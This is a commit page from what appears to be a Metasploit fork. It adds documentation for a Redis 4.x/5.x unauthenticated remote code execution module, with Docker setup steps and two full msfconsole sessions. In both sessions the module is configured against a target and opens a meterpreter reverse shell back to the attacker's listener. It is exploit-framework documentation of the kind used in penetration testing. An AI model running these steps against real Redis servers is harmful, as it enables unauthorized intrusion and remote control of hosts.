adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Renane module to redis_extension_cmd_exec.

Browse Source 
Fix #12143
This commit is contained in:
Green-m
2020-03-16 14:33:06 +08:00
parent bf8a1fc706
commit 4b1762081f
2 changed files with 1 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md
+173
View File
@@ -0,0 +1,173 @@
## Vulnerable Application
### Description
This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x
**Vulnerable Application Link**
- Official Docker Images
https://hub.docker.com/_/redis/
### Installation Setup.
```
docker pull redis
docker run -p 6379:6379 -d --name redis_slave redis
```
## Verification Steps
## Options
### CUSTOM
IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable.
It's only worked on linux system.
For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the
pre-compiled redis module to accomplish this exploit.
## Scenarios
### set CUSTOM true (available only on linux)
```
msf5 exploit(multi/redis/redis_unanth_rce) > options
Module options (exploit/multi/redis/redis_unanth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOM true yes Whether compile payload file during exploiting
PASSWORD foobared no Redis password for authentication test
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 6379 yes The target port (TCP)
SRVHOST 172.17.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 6666 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.17.0.1 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/redis/redis_unanth_rce) > set verbose false
verbose => false
msf5 exploit(multi/redis/redis_unanth_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:8080
[*] 127.0.0.1:6379 - Compile redis module extension file
[+] 127.0.0.1:6379 - Payload generate successful!
[*] 127.0.0.1:6379 - Listening on 172.17.0.1:6666
[*] 127.0.0.1:6379 - Rogue server close...
[*] 127.0.0.1:6379 - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400
[!] 127.0.0.1:6379 - This exploit may require manual cleanup of './vxwqrg.so' on the target
meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter >
```
### Set CUSTOM false (available on all system)
```
msf5 > use exploit/linux/redis/redis_unauth_exec
msf5 exploit(linux/redis/redis_unauth_exec) > options
Module options (exploit/linux/redis/redis_unauth_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOM false yes Whether compile payload file during exploiting
PASSWORD foobared no Redis password for authentication test
RHOSTS yes The target address range or CIDR identifier
RPORT 6379 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 6379 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/redis/redis_unauth_exec) > set rhosts 172.16.6.226
rhosts => 172.16.6.226
msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 172.16.6.1
srvhost => 172.16.6.1
msf5 exploit(linux/redis/redis_unauth_exec) > set srvport 6666
srvport => 6666
msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 172.16.6.1
lhost => 172.16.6.1
msf5 exploit(linux/redis/redis_unauth_exec) > set lport 9999
lport => 9999
msf5 exploit(linux/redis/redis_unauth_exec) > options
Module options (exploit/linux/redis/redis_unauth_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOM true yes Whether compile payload file during exploiting
PASSWORD foobared no Redis password for authentication test
RHOSTS 172.16.6.226 yes The target address range or CIDR identifier
RPORT 6379 yes The target port (TCP)
SRVHOST 172.16.6.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 6666 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.6.1 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/redis/redis_unauth_exec) > exploit
[*] Started reverse TCP handler on 172.16.6.1:9999
[*] 172.16.6.226:6379 - Listening on 172.16.6.1:6666
[*] 172.16.6.226:6379 - Rogue server close...
[*] 172.16.6.226:6379 - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.16.6.226
[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800
[*] 172.16.6.226:6379 - Command Stager progress - 100.00% done (819/819 bytes)
[!] 172.16.6.226:6379 - This exploit may require manual cleanup of './wfuujx.so' on the target
meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > getpid
Current pid: 173
```